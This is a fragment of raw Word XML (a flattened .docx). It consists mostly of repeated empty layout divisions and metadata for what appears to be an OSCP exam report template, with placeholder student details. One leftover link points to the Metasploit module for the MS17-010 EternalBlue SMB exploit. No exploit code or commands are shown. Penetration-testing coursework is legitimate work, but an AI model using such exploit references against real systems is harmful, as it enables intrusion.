      </w:divBdr>
    </w:div>
    <w:div w:id="496118427">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="647708943">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="674109486">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="699086086">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="920484386">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="930234013">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1334261797">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1485462644">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1548182645">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="1925383633">
      <w:bodyDiv w:val="1"/>
      <w:marLeft w:val="0"/>
      <w:marRight w:val="0"/>
      <w:marTop w:val="0"/>
      <w:marBottom w:val="0"/>
      <w:divBdr>
        <w:top w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:left w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:bottom w:val="none" w:sz="0" w:space="0" w:color="auto"/>
        <w:right w:val="none" w:sz="0" w:space="0" w:color="auto"/>
      </w:divBdr>
    </w:div>
    <w:div w:id="19314277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metasploi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rapid7.com/db/modules/exploit/windows/smb/ms17_010_eternalbl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57ABF-BDE8-4287-A006-6CE2889DC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TotalTime>
  <Pages>13</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Offensive Security Certified Professional Exam Report</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Offensive Security Certified Professional Exam Report</dc:title>
  <dc:subject>Markdown</dc:subject>
  <dc:creator>student@youremailaddress.com;OSID: XXXX</dc:creator>
  <cp:keywords>Markdown, Example</cp:keywords>
  <cp:lastModifiedBy>Sumit Das</cp:lastModifiedBy>
  <cp:revision>22</cp:revision>
  <dcterms:created xsi:type="dcterms:W3CDTF">2024-08-25T05:27:00Z</dcterms:created>
  <dcterms:modified xsi:type="dcterms:W3CDTF">2024-08-25T12:53:00Z</dcterms:modified>
</cp:coreProperties>
</file>